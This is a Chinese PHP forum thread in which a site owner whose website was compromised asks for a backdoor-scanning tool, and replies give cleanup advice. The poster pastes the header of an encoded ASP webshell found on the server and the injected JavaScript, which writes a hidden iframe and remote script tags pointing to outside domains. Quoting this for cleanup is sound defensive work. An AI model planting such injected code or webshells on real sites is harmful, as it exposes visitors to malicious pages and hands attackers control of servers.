网站被挂马了找个扫描后门的工具
简单的说就是查找出大于小于1k 大于20k的 Php文件
扫描整个网站
我用dede的总是出错
请问有没有独立的可用的呢?
简单的说就是查找出大于小于1k 大于20k的 Php文件
扫描整个网站
我用dede的总是出错
请问有没有独立的可用的呢?
解决方案 »
- 一个很简单的问题,谁能帮我解开谜团
- 如何将调用的COM组件在不同的PHP页面都能调用?
- ecshop 跟随着漂浮的一个客服代码
- 如何判断是否可以成功创建memcache
- 怎么连接MYSQL数据库生成XML文档
- MYSQL 数据出错,求各大哥大虾解决。小弟感谢大哥们,在线等。。。
- 学习PHP,研究哪个开源项目,入门快点呢?
- 哪位大侠能够提供开源多用户相册系统
- 安装网站的时候mysql_connect 显示不支持!!!!!!!!!急求解决方法!!!!!!在线等~~
- 安装Phabricator,无法连接数据库
- 点phpMyAdmin Database Manager Version 2.10.2输什么密码?
- PHP做在线聊天<冷饭热炒>comet
但是没有php做的。而且,你怎么知道网站被挂马了。
就是速度慢
后来发现加载时候状态栏有显示别的网站
就看了源码 发现被挂马了
并且在好几个文件夹里找到后门程序 asp php的都有
为什么没有php做的呢 唉
你那个不叫木马程序。
1.你用的是什么系统?可能的话,从日志找出被侵入的痕迹。
例如,被篡改的文件最后在什么时间被修改,而那个时间段都有谁从什么地方登陆过。
2.如果是病毒的话,用杀毒软件查杀,缩小文件的访问权限。
3.确定被改写的密码,把被篡改的文件grep出来,恢复原始文件。
4.不排除内部人员搞鬼
老实话,如果是windows的话,真不知道该怎么弄。Linux/Unix的话相对比较容易解决。
VerName="冷-轩客户专用纯净版!.." '版权
Ver="绝对的非安全" '声明
StateName="http://www.hackah.cn" '状态栏文字#@~^6X8BAA==jD-Dc?mMkaOKb:nW!Yx1O,,O1,O,)"ndwKxk+ A;W6+.P{OD!+l6 P2..KD~Id!:n,16Y=/!8PUtGhAD.c*)fbhPtWD6r/W9+=HGDWr;W[+{E0&P[UAPPwM'tdE^oc+d Wa/+"d'M-MlnV;R..APP,~-C-zC&@*D(@!@*l&@!&MJP'P GkDwr.1/+9 MD3PL~Je&pwk4xL@*M8@!@*Bb`0mC8cXDKO/bt)D2rD1/m\CLvx6+.t,C@!@*D8@!JezG41+~P,~'ew
文件还很长 我只是把头部贴出来了
不是木马程序
只是添加的 类似<script src=http://12020.cn/2.js>之类的代码
加载他的js文件 该文件的内容我下载下来了 如下
document.write("<div style=\"display:none\">");
document.write("<iframe src=http://baidu.bbtu02.cn/w70/w70.htm width=100 height=0></iframe>");
document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/2344860.js"></script>');严格来说这应该是盗取流量的 和做弹窗的